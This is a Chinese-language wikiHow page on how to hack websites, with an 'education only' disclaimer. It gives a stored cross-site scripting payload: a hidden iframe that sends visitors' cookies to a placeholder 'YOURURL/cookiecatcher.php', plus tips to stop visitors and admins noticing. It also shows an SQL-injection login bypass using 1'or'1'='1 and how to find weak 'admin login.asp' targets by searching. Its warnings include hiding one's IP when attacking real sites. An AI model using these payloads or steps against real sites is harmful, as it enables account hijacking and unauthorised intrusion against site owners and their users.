Skip to Content

登陆/注册

如何入侵一个网站

下载PDF文件

下载PDF文件

注意：这篇指南文章只作教育用途，应该用在正当的入侵测试上，用来提升网站的安全性。这篇指南文章会教你如何一步步入侵安全性低的网站。

方法 1

方法 1 的 3:

使用跨站点脚本处理方法

下载PDF文件

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

比如可以发布信息帖子的网站。注意，如果网站安全性强，下面入侵方法就不起作用。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

2
创建帖子。 要在帖子内容中输入一些内容，这样不管谁点击了帖子，数据都会被窃取。
- 你可以测试一下，看看该网站系统会不会过滤代码。在帖子中输入<script...>alert(“test”)</...script> （把句点删掉）。如果点击帖子的时候，会出现一个警告窗口，说明站点易受攻击。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

本攻击的目的是窃取用户的cookie内容，通过cookie内容，你就可以轻松登录安全性弱的网站，进入对方的账户。这里你需要准备cookie捕捉器（某种代码），这个代码会捕捉用户的cookie并转发出去，你可以给一个可以登录的，又支持PHP网页的网站上传一个捕捉器。例子里有个cookie捕捉器供参考。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

4
将帖子和cookie捕捉器一起发布出去。 输入一定的代码，就可以让帖子抓取用户的cookie，并发送到你的网站中去。你需要在代码之后输入一些文字，减少访客的怀疑，并减少管理员删帖的几率。
- cookie捕捉器的例子：<...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>（将句点删掉。）
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

之后就可以将抓取的cookie发送到你的网站，你可以随意使用对方的cookies了。

广告

方法 2

方法 2 的 3:

执行注入式攻击

下载PDF文件

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

你要找到一个管理员（admin）账户安全性低、容易破解的网站。你可以在google上找 admin login.asp 这两个关键词。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

输入admin作为用户名，然后用数字或一串字母作为密码登录进去。密码可能是任何数字和字母的组合，但最常见的例子有1’或’1’=’1。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

可能会试错几次密码，所以要久一点。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

最后就可以以某个密码登录进安全性低的网站，进行入侵了。

广告

方法 3

方法 3 的 3:

为成功入侵做准备

下载PDF文件

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

要是你想要真正掌握破解网站的本质方法，你得了解电脑和各种互联网运行的方式。可以学一两种像Python或SQL的编程语言，这样你就可以更好地掌控电脑，找出网站系统中的脆弱点了。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

你也需要对HTML和javascript有很好的了解，这样就能针对性地破解某些网页了。这些代码需要一段时间的学习，不过网上有很多很好的学习资料，要是你仔细找的话，不愁找不到的。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

白帽黑客是身具黑客知识，把能力发挥在正当之处的特殊黑客。白帽黑客会曝光安全漏洞，还会让互联网更稳定实用。要是你也想发挥正义的力量，或者想保护自家网站的安全，你可以咨询一些白帽黑客了解一些建议。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

想了解怎么入侵网站，或者想要保护自己的网站，你需要做很多研究工作。网站受攻击的方式有很多种的，所以要坚持学习相关知识。
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

因为网站的入侵方式也在不断变化，你要确保自己跟上最前沿的相关知识。一种攻击奈何不了你，不代表你就没有其他漏洞了！

广告

小提示

访问黑客论坛，了解各种有用的技巧。

广告

警告

要是你在现实生活中尝试入侵网站，用一些软件掩盖住你的IP地址。
光读这篇网站，是不能让你瞬间变为一名黑客的。你一定要多涉猎各种知识，多多练习，才能成功。
入侵网站绝对是非法的。如果入侵网站责任在你，你一定会惹上法律问题。

广告

你可能还喜欢

广告

参考

关于本wikiHow

wikiHow是一个“多人协作写作系统”，因此我们的很多文章都是由多位作者共同创作的。为了创作这篇文章，32位用户（部分匿名）多次对文章进行了编辑和改进。这篇文章已经被读过137,042次。

分类: 互联网

印度尼西亚语

打印

本页面已经被访问过137,042次。

这篇文章对你有帮助吗？

广告

-

-

394

.mwimg a.image{display:none}#header_logo{display:none}#cse-search-box{display:none}#cse-search-box-noscript{display:block !important}#cse-search-box-noscript .cse_q{color:#FFF;background-color:#B3CE9C}.wh_search .cse_q{width:88%}#mw-mf-main-menu-button{display:none;visibility:hidden}.header .search{display:none}#search_footer .cse_sa{background-image:url(/extensions/wikihow/mobile/images/white_mag.png);background-size:22px}.related_box{display:block;background:#EEE;border:5px solid #FFF;vertical-align:bottom;width:127px;background-size:180px;float:left;height:120px;position:relative}.related_box p{line-height:15px !important;font-size:13px;background-color:rgba(67,95,44,.4);color:#FFF;font-weight:bold;padding:8px;margin:0 !important;position:absolute;bottom:0}#noscript_header_logo{display:table-cell;vertical-align:middle;background-position:50% 77%;background-repeat:no-repeat;background-image:url(/extensions/wikihow/mobile/images/wikihow_logo_230.png);background-size:105px;width:auto;height:51px;padding:0 14px}.articleinfo{display:none}#iorg_free_data{z-index:50;width:100%;position:fixed}#ara_recommendations{display:none}

Design a Mobile Website

View Site in Mobile | Classic

Share by: